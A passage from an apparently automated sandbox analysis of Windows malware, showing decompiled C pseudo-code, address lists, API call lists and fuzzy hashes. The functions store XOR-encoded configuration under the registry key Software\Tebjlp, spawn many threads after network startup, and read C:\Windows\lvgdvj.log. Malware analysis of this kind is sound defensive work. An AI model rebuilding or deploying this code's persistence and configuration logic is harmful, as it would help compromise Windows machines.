                                					_t260 =  *0x22882b8; // 0x0
                                					E0221772B(_t260, _a4,  *_a4 + 8);
                                					E022054A2(_a4);
                                					goto L48;
                                				}
                                				E0221772B( &_v612, _a4, 0x100);
                                				_v1648 =  *((intOrPtr*)(_a4 + 0x100));
                                				_t375 = _v1648 -  *0x2287da0; // 0x54
                                				if(_t375 > 0) {
                                					_v1644 =  *((intOrPtr*)(_a4 + 0x104));
                                					_v1643 =  *((intOrPtr*)(_a4 + 0x105));
                                					_v1642 =  *((intOrPtr*)(_a4 + 0x106));
                                					_v1640 =  *((intOrPtr*)(_a4 + 0x108));
                                					__eflags = _v1640 - 0x400;
                                					if(_v1640 <= 0x400) {
                                						E0221772B( &_v1636, _a4 + 0x10c, _v1640);
                                						__eflags = _v1644 & 0x000000ff;
                                						if((_v1644 & 0x000000ff) < 0) {
                                							L9:
                                							goto L48;
                                						}
                                						__eflags = (_v1644 & 0x000000ff) - 2;
                                						if((_v1644 & 0x000000ff) > 2) {
                                							goto L9;
                                						}
                                						__eflags = _v1643 & 0x000000ff;
                                						if((_v1643 & 0x000000ff) < 0) {
                                							goto L9;
                                						}
                                						__eflags = (_v1643 & 0x000000ff) - 2;
                                						if((_v1643 & 0x000000ff) <= 2) {
                                							__eflags = (_v1636 & 0x000000ff) - 0x1e;
                                							if((_v1636 & 0x000000ff) <= 0x1e) {
                                								__eflags = _v1635 & 0x000000ff;
                                								if((_v1635 & 0x000000ff) == 0) {
                                									L15:
                                									E0221772B( &_v5748,  &_v1648, "true");
                                									_v5744 = _v1644;
                                									_v5743 = _v1643;
                                									E0221772B( &_v5742,  &_v1642, 2);
                                									E0221772B( &_v5740,  &_v1640, "true");
                                									E0221772B( &_v5736,  &_v1636, _v1640);
                                									_t218 = E022047BB( &_v5748, _v1640 + 0xc,  &_v612);
                                									__eflags = _t218;
                                									if(_t218 != 0) {
                                										_v272 = 0;
                                										while(1) {
                                											__eflags = _v272 - (_v1636 & 0x000000ff);
                                											if(_v272 >= (_v1636 & 0x000000ff)) {
                                												break;
                                											}
                                											_v356 = _v268;
                                											while(1) {
                                												__eflags = 0;
                                												if(0 == 0) {
                                													break;
                                												}
                                												__eflags = _v356 - _v268 - 0x50;
                                												if(_v356 - _v268 >= 0x50) {
                                													break;
                                												}
                                												_t284 = _v356 + 1;
                                												__eflags = _t284;
                                												_v356 = _t284;
                                											}
                                											_v356 = _v356 + 1;
                                											 *0x21e1148( &_v352, _t346 + _v268 - 0x660);
                                											__eflags = _v352 - 0x68;
                                											if(_v352 == 0x68) {
                                												__eflags = _v351 - 0x74;
                                												if(_v351 == 0x74) {
                                													__eflags = _v350 - 0x74;
                                													if(_v350 == 0x74) {
                                														__eflags = _v349 - 0x70;
                                														if(_v349 == 0x70) {
                                															_v1652 = 1;
                                														}
                                													}
                                												}
                                											}
                                											_v268 = _v356;
                                											_t280 = _v272 + 1;
                                											__eflags = _t280;
                                											_v272 = _t280;
                                										}
                                										__eflags = _v1652;
                                										if(_v1652 != 0) {
                                											 *0x2287da0 = _v1648;
                                											 *0x2287da4 = _v1644;
                                											 *0x2287da5 = _v1643;
                                											 *0x2287da6 = _v1642;
                                											 *0x2287da8 = _v1640;
                                											E0221772B(0x2287dac,  &_v1636, _v1640);
                                											E0221772B(0x22881ac,  &_v612, 0x100);
                                											E02204AF0( &_v1648, __eflags,  &_v1648); // executed
                                											goto L48;
                                										}
                                										goto L48;
                                									}
                                									goto L48;
                                								}
                                								__eflags = (_v1635 & 0x000000ff) - 1;
                                								if((_v1635 & 0x000000ff) == 1) {
                                									goto L15;
                                								}
                                								goto L48;
                                							}
                                							goto L48;
                                						}
                                						goto L9;
                                					}
                                					goto L48;
                                				}
                                				goto L48;
                                			}










































                                0x02206338
                                0x0220633e
                                0x02206352
                                0x02206354
                                0x02206355
                                0x0220635f
                                0x02206369
                                0x02206373
                                0x0220637d
                                0x02206391
                                0x02206393
                                0x02206395
                                0x02206396
                                0x022063aa
                                0x022063ac
                                0x022063ae
                                0x022063af
                                0x022063c6
                                0x022063cd
                                0x022063d7
                                0x0220672a
                                0x0220672e
                                0x0220695b
                                0x02206960
                                0x00000000
                                0x02206966
                                0x02206741
                                0x02206747
                                0x02206749
                                0x00000000
                                0x00000000
                                0x02206752
                                0x02206758
                                0x00000000
                                0x00000000
                                0x02206761
                                0x02206767
                                0x00000000
                                0x00000000
                                0x0220677a
                                0x02206782
                                0x02206785
                                0x02206788
                                0x00000000
                                0x00000000
                                0x022067a0
                                0x022067c5
                                0x022067e1
                                0x022067f2
                                0x022067f8
                                0x00000000
                                0x00000000
                                0x02206807
                                0x0220680d
                                0x00000000
                                0x00000000
                                0x02206813
                                0x02206816
                                0x0220681d
                                0x00000000
                                0x00000000
                                0x02206840
                                0x02206848
                                0x0220684a
                                0x00000000
                                0x00000000
                                0x02206859
                                0x0220685f
                                0x02206866
                                0x02206868
                                0x0220686f
                                0x0220686f
                                0x02206889
                                0x0220689b
                                0x022068a2
                                0x022068aa
                                0x022068b1
                                0x022068b3
                                0x022068b9
                                0x022068b9
                                0x022068d3
                                0x022068ea
                                0x0220690f
                                0x0220692b
                                0x02206938
                                0x02206940
                                0x02206947
                                0x02206953
                                0x00000000
                                0x02206958
                                0x022063ed
                                0x022063fe
                                0x0220640a
                                0x02206410
                                0x02206420
                                0x0220642f
                                0x0220643f
                                0x0220644f
                                0x02206455
                                0x0220645f
                                0x0220647e
                                0x02206492
                                0x02206494
                                0x022064c7
                                0x00000000
                                0x02206976
                                0x022064a2
                                0x022064a5
                                0x00000000
                                0x00000000
                                0x022064b2
                                0x022064b4
                                0x00000000
                                0x00000000
                                0x022064c2
                                0x022064c5
                                0x022064d8
                                0x022064db
                                0x022064ed
                                0x022064ef
                                0x02206507
                                0x02206517
                                0x02206525
                                0x02206531
                                0x02206547
                                0x0220655f
                                0x0220657c
                                0x0220659c
                                0x022065a4
                                0x022065a6
                                0x022065ad
                                0x022065c8
                                0x022065d4
                                0x022065da
                                0x00000000
                                0x00000000
                                0x022065e6
                                0x022065fd
                                0x0220660c
                                0x0220660e
                                0x00000000
                                0x00000000
                                0x0220661c
                                0x0220661f
                                0x00000000
                                0x00000000
                                0x022065f4
                                0x022065f4
                                0x022065f7
                                0x022065f7
                                0x0220662c
                                0x02206647
                                0x02206654
                                0x02206657
                                0x02206660
                                0x02206663
                                0x0220666c
                                0x0220666f
                                0x02206678
                                0x0220667b
                                0x0220667d
                                0x0220667d
                                0x0220667b
                                0x0220666f
                                0x02206663
                                0x0220668d
                                0x022065bf
                                0x022065bf
                                0x022065c2
                                0x022065c2
                                0x02206698
                                0x0220669f
                                0x022066ac
                                0x022066b8
                                0x022066c3
                                0x022066d0
                                0x022066dd
                                0x022066f5
                                0x0220670e
                                0x0220671d
                                0x00000000
                                0x02206722
                                0x00000000
                                0x0220696e
                                0x00000000
                                0x02206970
                                0x022064fd
                                0x02206500
                                0x00000000
                                0x00000000
                                0x00000000
                                0x02206972
                                0x00000000
                                0x02206974
                                0x00000000
                                0x022064c5
                                0x00000000
                                0x02206978
                                0x00000000

                                APIs
                                • RtlEnterCriticalSection.NTDLL(02219050), ref: 022063CD
                                • IsBadHugeWritePtr.KERNEL32(?,-00000008), ref: 02206741
                                • wsprintfA.USER32 ref: 022067A0
                                • lstrlen.KERNEL32(?,?), ref: 022067B7
                                • GlobalFree.KERNEL32(00000000), ref: 0220686F
                                • GlobalAlloc.KERNEL32(00000040,?), ref: 02206883
                                • RtlLeaveCriticalSection.NTDLL(02219050), ref: 02206960
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: CriticalGlobalSection$AllocEnterFreeHugeLeaveWritelstrlenwsprintf
                                • String ID: purity_control_%x$purity_control_%x
                                • API String ID: 18977696-2962537068
                                • Opcode ID: ff16fe6140750678954db58127e2dab8411220fae59217d4d0616943ea55b616
                                • Instruction ID: 0d986b9b8cc8a9a63062a71e90fe27050937707f71288ddaf70f96deae7b09cf
                                • Opcode Fuzzy Hash: ff16fe6140750678954db58127e2dab8411220fae59217d4d0616943ea55b616
                                • Instruction Fuzzy Hash: 7302A371910218DFDB24CFA4DC90FFA77B6BF94304F0485A8E5499B289D7729AA0CF90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 82%
                                			E02205760(intOrPtr _a4) {
                                				char* _v8;
                                				void _v271;
                                				char _v272;
                                				void _v535;
                                				char _v536;
                                				char _v540;
                                				int _v544;
                                				int _v548;
                                				char* _v552;
                                				signed int _v556;
                                				int _v560;
                                				void* _v564;
                                				signed int _v568;
                                				signed int _v572;
                                				char* _t127;
                                				void* _t131;
                                				long _t134;
                                				long _t135;
                                				char _t137;
                                				signed int _t141;
                                				signed int _t154;
                                				char* _t176;
                                				char* _t189;
                                				char _t201;
                                				void* _t214;
                                				void* _t216;
                                
                                				_t127 =  *0x2219074; // 0x4a0000
                                				_v8 = _t127;
                                				_v272 = 0;
                                				memset( &_v271, 0, 0x41 << 2);
                                				_v536 = 0;
                                				_t131 = memset( &_v535, 0, 0x41 << 2);
                                				_t216 = _t214 + 0x18;
                                				_v556 = 0x104;
                                				_v560 = 0;
                                				_v540 = 0;
                                				_v544 = 0;
                                				_v548 = 0;
                                				_v564 = 0;
                                				if( *0x2219008 == 0 ||  *0x2219074 == 0) {
                                					return _t131;
                                				}
                                				 *0x21e1148( &_v272, "Software\\Tebjlp");
                                				_t134 = RegOpenKeyExA(0x80000001,  &_v272, 0, 0xf003f,  &_v564); // executed
                                				if(_t134 != 0) {
                                					if(_a4 != 0) {
                                						return _t134;
                                					}
                                					_t134 = RegCreateKeyA(0x80000001,  &_v272,  &_v564); // executed
                                					if(_t134 != 0) {
                                						return _t134;
                                					}
                                				}
                                				if(_a4 != 0) {
                                					_t189 =  *0x2219074; // 0x4a0000
                                					_v8 = _t189;
                                					_v548 = 1;
                                					_v556 = 0;
                                					while(_v548 != 0 && _v556 < 0x3e8) {
                                						_v552 = _v8;
                                						_v560 = 1;
                                						while(_v560 < 5) {
                                							_t137 = "alfoC:\\Windows\\"; // 0x6f666c61
                                							wsprintfA( &_v272, "%c%d_%d", _t137, _v560, _v556);
                                							_t216 = _t216 + 0x14;
                                							_v544 = 4;
                                							_v540 = 0;
                                							if(RegQueryValueExA(_v564,  &_v272, 0, 0,  &_v540,  &_v544) == 0) {
                                								_t141 = "alfoC:\\Windows\\"; // 0x6f666c61
                                								_v540 = _v540 ^ _t141 * _v556;
                                								_v572 = _v560;
                                								_v572 = _v572 - 1;
                                								if(_v572 <= 3) {
                                									switch( *((intOrPtr*)(_v572 * 4 +  &M02205C16))) {
                                										case 0:
                                											 *_v552 = _v540;
                                											goto L47;
                                										case 1:
                                											_v552[4] = _v540;
                                											goto L47;
                                										case 2:
                                											_v552[8] = _v540;
                                											goto L47;
                                										case 3:
                                											_v552[0xc] = _v540;
                                											goto L47;
                                									}
                                								}
                                								L47:
                                								_v560 = _v560 + 1;
                                								continue;
                                							} else {
                                								_v548 = 0;
                                							}
                                							break;
                                						}
                                						_v552[0x10] = 0;
                                						_t134 = _v556 + 1;
                                						_v556 = _t134;
                                						_v8 =  &(_v8[0x14]);
                                					}
                                				} else {
                                					_v540 = 0;
                                					_v544 = 0x104;
                                					while(1) {
                                						_t134 = RegEnumValueA(_v564, _v540,  &_v272,  &_v544, 0, 0, 0, 0); // executed
                                						if(_t134 != 0) {
                                							break;
                                						}
                                						if(_v272 != 0) {
                                							RegDeleteValueA(_v564,  &_v272);
                                							_v544 = 0x104;
                                							_v272 = 0;
                                							continue;
                                						} else {
                                						}
                                						break;
                                					}
                                					_t176 =  *0x2219074; // 0x4a0000
                                					_v8 = _t176;
                                					_v556 = 0;
                                					while(_v556 < 0x3e8) {
                                						_v552 = _v8;
                                						if( *_v552 == 0) {
                                							L19:
                                						} else {
                                							_t134 = _v552;
                                							if(0 != 0) {
                                								_v560 = 1;
                                								while(_v560 < 5) {
                                									_t201 = "alfoC:\\Windows\\"; // 0x6f666c61
                                									wsprintfA( &_v272, "%c%d_%d", _t201, _v560, _v556);
                                									_t216 = _t216 + 0x14;
                                									_v568 = _v560;
                                									_v568 = _v568 - 1;
                                									if(_v568 <= 3) {
                                										switch( *((intOrPtr*)(_v568 * 4 +  &M02205C06))) {
                                											case 0:
                                												_v540 =  *_v552;
                                												goto L29;
                                											case 1:
                                												_v540 = 0;
                                												goto L29;
                                											case 2:
                                												_v540 = _v552[8];
                                												goto L29;
                                											case 3:
                                												_v540 = _v552[0xc];
                                												goto L29;
                                										}
                                									}
                                									L29:
                                									_t154 = "alfoC:\\Windows\\"; // 0x6f666c61
                                									_v540 = _v540 ^ _t154 * _v556;
                                									RegSetValueExA(_v564,  &_v272, 0, "true",  &_v540, "true"); // executed
                                									_v560 = _v560 + 1;
                                								}
                                								_v556 = _v556 + 1;
                                								_t134 =  &(_v8[0x14]);
                                								_v8 = _t134;
                                								continue;
                                							} else {
                                								goto L19;
                                							}
                                						}
                                						break;
                                					}
                                				}
                                				if(_v564 != 0) {
                                					_t135 = RegCloseKey(_v564); // executed
                                					return _t135;
                                				}
                                				return _t134;
                                			}





























                                0x0220576a
                                0x0220576f
                                0x02205772
                                0x02205786
                                0x02205788
                                0x0220579c
                                0x0220579c
                                0x0220579e
                                0x022057a8
                                0x022057b2
                                0x022057bc
                                0x022057c6
                                0x022057d0
                                0x022057e1
                                0x00000000
                                0x00000000
                                0x022057fd
                                0x0220581d
                                0x02205825
                                0x0220582b
                                0x00000000
                                0x00000000
                                0x02205845
                                0x0220584d
                                0x00000000
                                0x00000000
                                0x0220584d
                                0x02205858
                                0x02205a4b
                                0x02205a51
                                0x02205a54
                                0x02205a5e
                                0x02205a82
                                0x02205aa2
                                0x02205aa8
                                0x02205ac3
                                0x02205ade
                                0x02205af0
                                0x02205af6
                                0x02205af9
                                0x02205b03
                                0x02205b35
                                0x02205b46
                                0x02205b5a
                                0x02205b66
                                0x02205b75
                                0x02205b82
                                0x02205b8a
                                0x00000000
                                0x02205b9d
                                0x00000000
                                0x00000000
                                0x02205bae
                                0x00000000
                                0x00000000
                                0x02205bc0
                                0x00000000
                                0x00000000
                                0x02205bd1
                                0x00000000
                                0x00000000
                                0x02205b8a
                                0x02205bd4
                                0x02205abd
                                0x00000000
                                0x02205b37
                                0x02205b37
                                0x02205b37
                                0x00000000
                                0x02205b35
                                0x02205bdf
                                0x02205a70
                                0x02205a73
                                0x02205a7f
                                0x02205a7f
                                0x0220585e
                                0x0220585e
                                0x02205868
                                0x02205872
                                0x02205896
                                0x0220589e
                                0x00000000
                                0x00000000
                                0x022058a9
                                0x022058bb
                                0x022058c1
                                0x022058cb
                                0x00000000
                                0x00000000
                                0x022058ab
                                0x00000000
                                0x022058a9
                                0x022058d4
                                0x022058da
                                0x022058dd
                                0x02205901
                                0x02205914
                                0x02205923
                                0x02205935
                                0x02205925
                                0x02205925
                                0x02205933
                                0x0220593a
                                0x02205955
                                0x02205970
                                0x02205983
                                0x02205989
                                0x02205992
                                0x022059a1
                                0x022059ae
                                0x022059b6
                                0x00000000
                                0x022059c5
                                0x00000000
                                0x00000000
                                0x022059d9
                                0x00000000
                                0x00000000
                                0x022059ea
                                0x00000000
                                0x00000000
                                0x022059fb
                                0x00000000
                                0x00000000
                                0x022059b6
                                0x02205a01
                                0x02205a01
                                0x02205a15
                                0x02205a36
                                0x0220594f
                                0x0220594f
                                0x022058f2
                                0x022058fb
                                0x022058fe
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x02205933
                                0x00000000
                                0x02205923
                                0x02205a46
                                0x02205bf2
                                0x02205bfb
                                0x00000000
                                0x02205bfb
                                0x02205c05

                                APIs
                                • lstrcpy.KERNEL32(00000000,Software\Tebjlp), ref: 022057FD
                                • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,000F003F,00000000), ref: 0220581D
                                • RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 02205845
                                • RegEnumValueA.KERNELBASE(00000000,00000000,00000000,00000104,00000000,00000000,00000000,00000000), ref: 02205896
                                • RegCloseKey.KERNELBASE(00000000), ref: 02205BFB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: CloseCreateEnumOpenValuelstrcpy
                                • String ID: %c%d_%d$%c%d_%d$Software\Tebjlp$alfoC:\Windows\
                                • API String ID: 4133318789-511944855
                                • Opcode ID: b05d65f56fcc33e57d995852723b55bcd80c1dbe5999bacb3da7e8c705949cf0
                                • Instruction ID: bccacb4649a6fa5b50fc2cc66a7fa0f9ffa73df37b9f9827bba5340008c257b3
                                • Opcode Fuzzy Hash: b05d65f56fcc33e57d995852723b55bcd80c1dbe5999bacb3da7e8c705949cf0
                                • Instruction Fuzzy Hash: CDC12770960228EBDB24CF94DCD8BE9B7B5BB58304F5082C9D509AA295C7B49ED4CF90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SetErrorMode.KERNELBASE(00008002), ref: 0221457F
                                • WSAStartup.WS2_32(00000002,?), ref: 0221458E
                                • RtlInitializeCriticalSection.NTDLL(02219030), ref: 02214599
                                • RtlInitializeCriticalSection.NTDLL(02219018), ref: 022145A4
                                • RtlInitializeCriticalSection.NTDLL(02219050), ref: 022145AF
                                  • Part of subcall function 02213B60: LoadLibraryA.KERNELBASE(02202154), ref: 02213C13
                                  • Part of subcall function 02213B60: GetProcAddress.KERNEL32(00000000,0220278C), ref: 02213C36
                                  • Part of subcall function 02213B60: GetProcAddress.KERNEL32(00000000,022027A0), ref: 02213C4E
                                  • Part of subcall function 02213B60: GetProcAddress.KERNEL32(00000000,022027B0), ref: 02213C67
                                  • Part of subcall function 02213B60: LoadLibraryA.KERNELBASE(02202894), ref: 02213C79
                                  • Part of subcall function 02213B60: GetProcAddress.KERNEL32(00000000,022028D8), ref: 02213C9C
                                  • Part of subcall function 02213B60: GetProcAddress.KERNEL32(00000000,022028B0), ref: 02213CB5
                                  • Part of subcall function 02213B60: GetProcAddress.KERNEL32(00000000,022028C4), ref: 02213CCD
                                  • Part of subcall function 02213B60: GetProcAddress.KERNEL32(00000000,022028A0), ref: 02213CE6
                                • CreateThread.KERNELBASE(00000000,00000000,Function_000327D4,00000000,00000000,00000000), ref: 022145D2
                                  • Part of subcall function 022041C6: RtlEnterCriticalSection.NTDLL(02219030), ref: 022041D6
                                  • Part of subcall function 022041C6: RtlLeaveCriticalSection.NTDLL(02219030), ref: 02204260
                                • CreateThread.KERNELBASE(00000000,00000000,Function_00029EEA,00000000,00000000,?), ref: 022145F9
                                  • Part of subcall function 022041C6: CloseHandle.KERNEL32(00000000,?,?,02213A55,00000000), ref: 02204247
                                • CreateThread.KERNELBASE(00000000,00000000,Function_0003392D,00000000,00000000,?), ref: 02214620
                                • CreateThread.KERNELBASE(00000000,00000000,Function_00028962,00000000,00000000,?), ref: 02214647
                                • CreateThread.KERNELBASE(00000000,00000000,Function_0002A2F5,00000000,00000000,?), ref: 0221466E
                                • CreateThread.KERNELBASE(00000000,00000000,Function_0002426A,00000000,00000000,?), ref: 02214695
                                • CreateThread.KERNELBASE(00000000,00000000,Function_00027A3A,00000000,00000000,?), ref: 022146BC
                                • CreateThread.KERNELBASE(00000000,00000000,Function_000283C9,00000000,00000000,?), ref: 022146E3
                                • CreateThread.KERNELBASE(00000000,00000000,Function_0002878B,00000000,00000000,?), ref: 0221470A
                                • Sleep.KERNELBASE(00000200), ref: 02214727
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: CreateThread$AddressProc$CriticalSection$Initialize$LibraryLoad$CloseEnterErrorHandleLeaveModeSleepStartup
                                • String ID:
                                • API String ID: 3135310872-0
                                • Opcode ID: a46408892b52ccf21d6166cb87cd1dd452e883bf33039043bef291e4962aa71f
                                • Instruction ID: 9a4d3bb7e98b95e5f20ffa528c9bed1328bafe47b54b4b4877e5168843499d82
                                • Opcode Fuzzy Hash: a46408892b52ccf21d6166cb87cd1dd452e883bf33039043bef291e4962aa71f
                                • Instruction Fuzzy Hash: 7741DD72BD0344BBFB20B7E09C5BF9A77A89B14F01F104550B70DBD0C59AF02A948B6A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 74%
                                			_entry_(void* __ebx, void* __edi, void* __esi) {
                                				WCHAR* _v8;
                                				intOrPtr _v20;
                                				intOrPtr* _v24;
                                				intOrPtr _v28;
                                				struct _STARTUPINFOW _v96;
                                				char _v100;
                                				char _v104;
                                				int _v108;
                                				char _v112;
                                				char _v116;
                                				signed int _v120;
                                				intOrPtr _v124;
                                				intOrPtr* _t27;
                                				void* _t30;
                                				signed int* _t37;
                                				signed int _t38;
                                				signed int _t40;
                                				int _t42;
                                				intOrPtr* _t43;
                                				signed int _t44;
                                				intOrPtr _t52;
                                				int _t57;
                                				signed int _t60;
                                				intOrPtr _t65;
                                
                                				_push(0xffffffff);
                                				_push(0x4020f8);
                                				_push(0x401830);
                                				_push( *[fs:0x0]);
                                				 *[fs:0x0] = _t65;
                                				_push(__edi);
                                				_v28 = _t65 - 0x68;
                                				_v8 = 0;
                                				_t57 = 2;
                                				__set_app_type(_t57);
                                				 *0x403090 =  *0x403090 | 0xffffffff;
                                				 *0x403094 =  *0x403094 | 0xffffffff;
                                				 *(__p__fmode()) =  *0x40308c;
                                				_t27 = __p__commode();
                                				_t50 =  *0x403088;
                                				 *_t27 =  *0x403088;
                                				 *0x403098 = _adjust_fdiv;
                                				_t30 = E00401825( *_adjust_fdiv);
                                				if( *0x403070 == 0) {
                                					__setusermatherr(E00401822);
                                					_pop(_t50);
                                				}
                                				E00401810(_t30);
                                				L0040180A();
                                				_v112 =  *0x403084;
                                				__imp____wgetmainargs( &_v100,  &_v116,  &_v104,  *0x403080,  &_v112, 0x403008, 0x40300c); // executed
                                				_push(0x403004);
                                				_push(0x403000);
                                				L0040180A();
                                				_t37 = __imp___wcmdln;
                                				_t60 =  *_t37;
                                				if(_t60 != 0) {
                                					_v120 = _t60;
                                					__eflags =  *_t60 - 0x22;
                                					if( *_t60 != 0x22) {
                                						while(1) {
                                							__eflags =  *_t60 - 0x20;
                                							if( *_t60 <= 0x20) {
                                								goto L9;
                                							}
                                							_t60 = _t60 + _t57;
                                							_v120 = _t60;
                                						}
                                					} else {
                                						while(1) {
                                							_t60 = _t60 + _t57;
                                							_v120 = _t60;
                                							_t44 =  *_t60;
                                							__eflags = _t44;
                                							if(_t44 == 0) {
                                								break;
                                							}
                                							__eflags = _t44 - 0x22;
                                							if(_t44 != 0x22) {
                                								continue;
                                							}
                                							break;
                                						}
                                						__eflags =  *_t60 - 0x22;
                                						if( *_t60 == 0x22) {
                                							L8:
                                							_t60 = _t60 + _t57;
                                							__eflags = _t60;
                                							_v120 = _t60;
                                						}
                                					}
                                					L9:
                                					_t38 =  *_t60;
                                					__eflags = _t38;
                                					if(_t38 != 0) {
                                						__eflags = _t38 - 0x20;
                                						if(_t38 <= 0x20) {
                                							goto L8;
                                						}
                                					}
                                					_v96.dwFlags = 0;
                                					GetStartupInfoW( &_v96);
                                					__eflags = _v96.dwFlags & 0x00000001;
                                					if(__eflags == 0) {
                                						_t40 = 0xa;
                                					} else {
                                						_t40 = _v96.wShowWindow & 0x0000ffff;
                                					}
                                					_push(_t40);
                                					_t42 = E00401435(_t50, _t57, __eflags, GetModuleHandleW(0), 0, _t60); // executed
                                					_v108 = _t42;
                                					exit(_t42);
                                					_t43 = _v24;
                                					_t52 =  *((intOrPtr*)( *_t43));
                                					_v124 = _t52;
                                					_push(_t43);
                                					_push(_t52);
                                					L00401804();
                                					return _t43;
                                				} else {
                                					_v8 = _v8 | 0xffffffff;
                                					 *[fs:0x0] = _v20;
                                					return _t37;
                                				}
                                			}



























                                0x00401682
                                0x00401684
                                0x00401689
                                0x00401694
                                0x00401695
                                0x004016a1
                                0x004016a2
                                0x004016a7
                                0x004016ac
                                0x004016ae
                                0x004016b5
                                0x004016bc
                                0x004016cf
                                0x004016d1
                                0x004016d7
                                0x004016dd
                                0x004016e6
                                0x004016eb
                                0x004016f6
                                0x004016fd
                                0x00401703
                                0x00401703
                                0x00401704
                                0x00401713
                                0x0040171d
                                0x00401736
                                0x0040173c
                                0x00401741
                                0x00401746
                                0x0040174e
                                0x00401753
                                0x00401757
                                0x0040176c
                                0x0040176f
                                0x00401773
                                0x004017ba
                                0x004017ba
                                0x004017be
                                0x00000000
                                0x00000000
                                0x004017c0
                                0x004017c2
                                0x004017c2
                                0x00401775
                                0x00401775
                                0x00401775
                                0x00401777
                                0x0040177a
                                0x0040177d
                                0x00401780
                                0x00000000
                                0x00000000
                                0x00401782
                                0x00401786
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00401786
                                0x00401788
                                0x0040178c
                                0x0040178e
                                0x0040178e
                                0x0040178e
                                0x00401790
                                0x00401790
                                0x0040178c
                                0x00401793
                                0x00401793
                                0x00401796
                                0x00401799
                                0x0040179b
                                0x0040179f
                                0x00000000
                                0x00000000
                                0x0040179f
                                0x004017a1
                                0x004017a8
                                0x004017ae
                                0x004017b2
                                0x004017c9
                                0x004017b4
                                0x004017b4
                                0x004017b4
                                0x004017ca
                                0x004017d5
                                0x004017da
                                0x004017de
                                0x004017e4
                                0x004017e9
                                0x004017eb
                                0x004017ee
                                0x004017ef
                                0x004017f0
                                0x004017f7
                                0x00401759
                                0x00401759
                                0x00401760
                                0x0040176b
                                0x0040176b

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.314281545.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.314272065.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314297689.0000000000402000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314331044.0000000000425000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314403919.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314484210.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314601354.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Similarity
                                • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargsexit
                                • String ID:
                                • API String ID: 3327129161-0
                                • Opcode ID: a7e3de02016792ec4999e95f60872d58e145630f5871f36365fbc75c2c295fc9
                                • Instruction ID: dcf3f338402d9aae81c2f9e9b520dcb6328aedd0bbb1ca33c4f5cfcad8a8470b
                                • Opcode Fuzzy Hash: a7e3de02016792ec4999e95f60872d58e145630f5871f36365fbc75c2c295fc9
                                • Instruction Fuzzy Hash: 844160B69013049FC724AFA5DE49AA9BBB8FB04711F20423FEA55B72E0D7784941CB58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 69%
                                			E022055BE() {
                                				void _v263;
                                				char _v264;
                                				void _v523;
                                				char _v524;
                                				void* _v528;
                                				long _v532;
                                				void* _v536;
                                				long _v540;
                                				long _v544;
                                				int _t40;
                                				void* _t73;
                                				void* _t75;
                                
                                				_v544 = 0;
                                				_v532 = 0;
                                				_v540 = 0;
                                				_v528 = 0;
                                				_v264 = 0;
                                				memset( &_v263, 0, 0x40 << 2);
                                				asm("stosb");
                                				_v524 = 0;
                                				memset( &_v523, 0, 0x40 << 2);
                                				_t75 = _t73 + 0x18;
                                				_t58 = 0;
                                				asm("stosw");
                                				asm("stosb");
                                				_t40 = CreateFileA("C:\\Windows\\lvgdvj.log", 0x80000000, 1, 0, 3, 0x80, 0); // executed
                                				_v536 = _t40;
                                				if(_v536 != 0xffffffff) {
                                					_v532 = GetFileSize(_v536, 0);
                                					if(_v532 != 0xffffffff && _v532 > 0x400) {
